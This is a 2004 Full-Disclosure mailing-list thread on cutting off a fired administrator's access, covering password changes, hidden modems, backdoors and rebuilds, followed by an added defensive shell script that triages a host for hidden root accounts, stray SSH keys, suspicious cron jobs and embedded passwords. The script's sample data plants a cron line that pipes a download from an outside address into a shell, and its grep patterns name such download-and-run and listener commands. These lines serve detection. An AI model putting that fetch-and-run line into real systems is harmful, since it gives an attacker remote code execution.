Changing passwords would be a good move. It may be worth cracking the old password - if it's not known - and doing a quick scan of scripts just to make sure the admin password isn't embedded in a script (an appalling practice that should be eliminated ... but you don't want to wait for something to fail before finding out about it).

Make sure that everybody knows that the admin is no longer allowed access to the system (everybody! you don't want the admin to be able to call a remote user and get their credentials). Advise any service providers or support organisations who may otherwise assume that the admin has access to systems. If you have any external services which allow automated updates (domain registration details, nameserver details) then you need to change these authentication credentials as well. Make sure that any physical access credentials that the admin may have known get changed (keycode entry systems etc.).

If you have any remote access systems then make sure these are completely reviewed - if they are a black box solution (Cisco, Nortel etc.) with very little opportunity for software modifications, then have the configuration checked by an expert. If your remote access system is home-grown (Windows, Linux etc.) then you may want to reinstall from scratch - just to make sure there aren't any backdoors. If you are using passwords for remote access then all passwords must be changed ... not just the admin's password (I recommend using two-factor authentication for remote access anyway). If you allow on-demand connections to other networks (analog or ISDN) you should change the authentication (PAP/CHAP password etc.) ... I know you can't trust Caller ID for analog circuits - I'm not sure about ISDN. Admin passwords on the network equipment should be changed as well.

Check your system connections looking for any modems or wireless access points that the admin may have installed to make their access easier (I've heard of an admin who installed a modem and hid it under the raised floor in a systems room ... so that he could have access to the company's extensive library even after he left the company ... he was still using it a year after he left!).
You will need to check everywhere. Any dial-out solutions you have will also need to be checked (connections to dial-out banking services, payroll, links for internet testing etc.) ... even though they are supposedly dial-out they may have a dial-in facility (which the admin knows about). Get a list of all analog and ISDN lines from your accounts dept and make sure you know what each line is used for.

Unfortunately, having been an admin he/she may have previously cracked people's passwords (to test the password strength) or users may have disclosed their password. So all passwords should be expired (bear in mind that people may use the same password in multiple systems, so the password may need to be expired in systems that weren't administered by the rogue admin).

Lock down as much as you can at the outset - if you have any systems which hold particularly sensitive data then pay them special attention (check code checksums against supplier checklists), go through all listening network services, check cron jobs and boot scripts ... if unsure, rebuild the system.

You can't do much about data they stole while they were a valid administrator; however, if this could include sensitive personal data you may need to inform the authorities.

You can't really contend with an admin who just 'turns bad' - obviously most companies want to keep their employees motivated and (where possible) happy, and that should apply to the admin as much as anyone else. Having multiple admins can be a benefit - or regular audits from a contracted admin. Make sure the admin takes all his/her holidays and have a suitably expert replacement while they're away. An admin with a grudge is a great inconvenience - it's always worthwhile expending time and money at the outset to fully check the references and ensure there are no recorded offences which ring alarm bells for you.

From: "Michael T. Harding" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Removing Fired admins
Date: Fri, 13 Feb 2004 11:01:46 -0500

Guys;

Thanks for the input and I love the philosophical debate about how this happened, what I can do in the future to prevent it, etc.

A little more info; I am being brought in to help consult on this project. The ex-admin is, well, let's just say the local and state law enforcement teams are being brought in today to assist, and therefore the problem is probably pretty deep. He has been a fully entrenched admin since the inception of the agency.

What I really am looking for is some kind of checklist/information sheet so we don't forget anything major, at least to check.

Depending on what we might find today, the decision is already on the table as to whether we should treat this as a total breach and scrub the whole plant and start over. That remains to be seen.

While an automated solution would be great to have, I don't have time to research them before we get to work. (I am of the belief that they won't work well anyway but that is another debate.)

Does anyone know of a SANS, or GIAC or any other security body who has a "minder" list of some sort? I know others have gone through this and have learned some lessons, both good and bad ones, that I hope they can share.

If not, I will try and document what we do and maybe look to publish something for future reference.

Thanks,

> From: "James Patterson Wicks" <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] Removing Fired admins
> Date: Fri, 13 Feb 2004 08:06:57 -0500
>
> Only the senior administrator and the CTO have the root password to the
> Unix systems.
> The senior admin does not "own" any servers, but is the manager for all of the other admins. Could he get mad and make changes to the interpreter? The server "owner" would notice this and check the changes against the change management log. Any unusual events would be sent to the CTO.
>
> Like you said, there is no magic button to press and instantly remove an admin's influence from an enterprise. BUT if you have a good process in place that leverages existing technologies, you can do a good job of protecting your enterprise. Admins leave companies all the time, but enterprises continue to operate without a problem.
>
> If all else fails, make sure that the company lawyer is in the office when you fire the admin. A good threat can go a long way.
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Volker Tanger
> Sent: Friday, February 13, 2004 2:51 AM
> To: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Removing Fired admins
>
> Hi!
>
> > We are working on something called "The Button", which is nothing but
> > small script that activates a series of scripts that change all root,
> > local and domain administrator passwords on our Unix and Windows
> > servers when run.
>
> The ex-admin had ROOT access to "his" servers, right? So he can change ANYTHING, right? Including the script, e.g. like NOT changing passwords or adding secret admin-level accounts, right?
>
> You said "script", so it uses BASH, PERL or something. ROOT can change anything, right? So he could have changed the BASH, PERL interpreter or something, right?
>
> There is no technical solution to a social problem - well, except in this case maybe reformatting the disks and reinstalling from scratch and clean media.
>
> Sorry
>
> Volker Tanger
> ITK-Security
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
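The host-level items from the checklist at the top of this message (hidden UID-0 accounts, leftover SSH keys, suspicious cron jobs, passwords embedded in scripts, plus the listening-service and package-checksum review) as one POSIX shell triage script. This is an added example, not code from any message in the thread. The passwd lines, key strings, 198.51.100.7 address and script contents are constructed fixture data for the demonstration; on a real host point the functions at /etc/passwd, /home, /etc/cron* and your script directories. As Volker Tanger's reply points out, a root-level admin could have replaced grep, awk or find themselves, so on the actual machine run this from a trusted boot medium against a mounted image of the disk rather than on the live system.

```shell
#!/bin/sh
# Post-departure host triage (added example). Offline fixtures exercise every
# check; live_host_checks needs the real system and only runs with --live.

# UID-0 accounts other than root: a hidden second root is a classic backdoor.
find_extra_uid0() {            # $1 = passwd file
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Every authorized_keys file under a tree, with each key's comment field, so a
# departed admin's key can be spotted by its "user@host" tag even in a
# service account's home directory.
list_authorized_keys() {       # $1 = root of the home directories
    find "$1" -type f -name authorized_keys 2>/dev/null | while read -r f; do
        awk -v f="$f" 'NF >= 3 { print f ": " $NF }' "$f"
    done
}

# Cron entries that run from world-writable locations, pipe a download into a
# shell, decode a blob, or start a listener. Prints "file:line:text" per hit.
flag_suspicious_cron() {       # $1 = directory of crontab files
    grep -rHnE '(/tmp/|/dev/shm/|/var/tmp/|curl[^|]*\|[[:space:]]*(ba)?sh|wget[^|]*\|[[:space:]]*(ba)?sh|base64 -d|nc -l)' "$1" 2>/dev/null || :
}

# Credentials embedded in scripts: password-like assignments and CLI flags.
# Expect false positives (prompt strings etc.); this narrows the manual
# review, it does not replace it.
scan_embedded_creds() {        # $1 = directory of scripts
    grep -rIHniE '(passw(or)?d|pwd|secret|token)[[:space:]]*[=:][[:space:]]*[^[:space:]]{4,}|sshpass[[:space:]]+-p|mysql.*[[:space:]]-p[^[:space:]]+' "$1" 2>/dev/null || :
}

# Checks that only make sense on the real host: listening sockets, per-user
# crontabs, and package file checksums against the vendor database.
live_host_checks() {
    (ss -lntup || netstat -lntup) 2>/dev/null
    cut -d: -f1 /etc/passwd | while read -r u; do
        crontab -l -u "$u" 2>/dev/null | sed "s/^/$u: /"
    done
    if command -v rpm >/dev/null 2>&1; then rpm -Va
    elif command -v debsums >/dev/null 2>&1; then debsums -c
    fi
}

# Constructed sample tree with exactly one finding of each kind; prints its path.
build_fixture() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/home/alice/.ssh" "$d/home/svc/.ssh" "$d/cron.d" "$d/scripts"
    printf 'root:x:0:0:root:/root:/bin/sh\nalice:x:1000:1000::/home/alice:/bin/sh\ntoor:x:0:0::/root:/bin/sh\n' > "$d/passwd"
    printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyAlice alice@desk\n' > "$d/home/alice/.ssh/authorized_keys"
    printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyAdmin admin@oldlaptop\n' > "$d/home/svc/.ssh/authorized_keys"
    printf '0 3 * * * root /usr/local/bin/backup.sh\n*/5 * * * * root curl -s http://198.51.100.7/u | sh\n' > "$d/cron.d/jobs"
    printf '#!/bin/sh\nPGPASSWORD=Adm1nHunter2 pg_dump prod > /backup/prod.sql\nlogger "backup done"\n' > "$d/scripts/backup.sh"
    printf '#!/bin/sh\nlogger "rotate logs"\n' > "$d/scripts/rotate.sh"
    echo "$d"
}

# Demonstration run against the constructed fixture.
demo_dir=$(build_fixture)
echo "== extra UID-0 accounts";  find_extra_uid0 "$demo_dir/passwd"
echo "== authorized_keys";       list_authorized_keys "$demo_dir/home"
echo "== suspicious cron";       flag_suspicious_cron "$demo_dir/cron.d"
echo "== embedded credentials";  scan_embedded_creds "$demo_dir/scripts"
rm -rf "$demo_dir"
if [ "${1:-}" = "--live" ]; then live_host_checks; fi
```

The four offline functions are deliberately separate from `live_host_checks` so the same script can be run against a mounted disk image (pass the image's etc, home and cron directories) where nothing from the suspect host executes. Treat every hit as a lead for the checklist's "if unsure, rebuild the system" decision, not as a verdict.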